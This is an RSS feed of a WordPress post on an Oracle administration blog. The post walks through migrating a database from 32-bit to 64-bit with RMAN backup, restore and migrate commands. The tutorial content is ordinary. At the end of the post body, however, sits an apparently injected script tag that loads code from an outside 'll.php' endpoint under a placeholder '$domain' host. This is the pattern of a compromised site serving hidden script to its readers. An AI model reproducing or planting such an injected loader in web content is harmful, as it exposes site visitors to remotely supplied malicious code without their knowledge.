<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; Migrate from 32 bit to 64 bit using RMAN</title>
	<atom:link href="http://www.bestremotedba.com/tag/migrate-from-32-bit-to-64-bit-using-rman/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Migrate from 32 bit to 64 bit using RMAN</title>
		<link>http://www.bestremotedba.com/migrate-from-32-bit-to-64-bit-using-rman/</link>
		<comments>http://www.bestremotedba.com/migrate-from-32-bit-to-64-bit-using-rman/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 03:07:56 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[RMAN]]></category>
		<category><![CDATA[Migrate from 32 bit to 64 bit using RMAN]]></category>
		<category><![CDATA[Using RMAN Migrate from 32 bit to 64 bit]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=588</guid>
		<description><![CDATA[Migrate from 32 bit to 64 bit using RMAN]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>Migrate from 32 bit to 64 bit using RMAN</p>
<p>I have Checked it on 10g and confirmed it is working. You can use it from 9i to 11g.</p>
<p>Step 1 &#8211; Take a Backup on Source 32 Bit Server:<br />
			Create a full backup of the database including all archivelogs:<br />
				RMAN> run  {<br />
				allocate channel c1 type disk;<br />
				allocate channel c2 type disk;<br />
				backup database plus archivelog;<br />
				backup current controlfile;  }<br />
Step 2 : Preparing target 64 bit server:<br />
		Install the OS and Oracle Software.<br />
Step 3 : Copy RMAN backup files from Source Server:<br />
		Use simple copy command to copy the rman backup files from source server to target server.<br />
Step 4 : Create the pfile or copy the pfile from source server:<br />
		Create the pfile or copy the pfile from source server.<br />
Step 5 : Bring up the database<br />
		Startup nomount the new instance.<br />
		Connect to rman and set the dbid:<br />
			$ rman target / nocatalog RMAN> set dbid=<dbid from the 32 server>;<br />
		Restore the controlfile:<br />
			RMAN> restore controlfile from /u01/backup_32bit/<backup_piece_name>;<br />
			RMAN> alter database mount;<br />
			RMAN> restore database;<br />
		Identify the archivelog till you want to do the recovery and check if you have all the backups you need to do it and run:<br />
			RMAN> run {<br />
				set until sequence xxxx;<br />
				recover database;<br />
						}<br />
			RMAN> exit<br />
Step 6 : Migrate to 64Bit:<br />
			SQL> recover database until cancel using backup controlfile;<br />
			cancel<br />
			SQL> alter database open resetlogs migrate;<br />
			SQL> @$ORACLE_HOME/rdbms/admin/utlirp.sql<br />
			SQL> @$ORACLE_HOME/rdbms/admin/utlrp.sql<br />
			SQL> shutdown immediate;<br />
			SQL> startup<br />
<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/migrate-from-32-bit-to-64-bit-using-rman/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

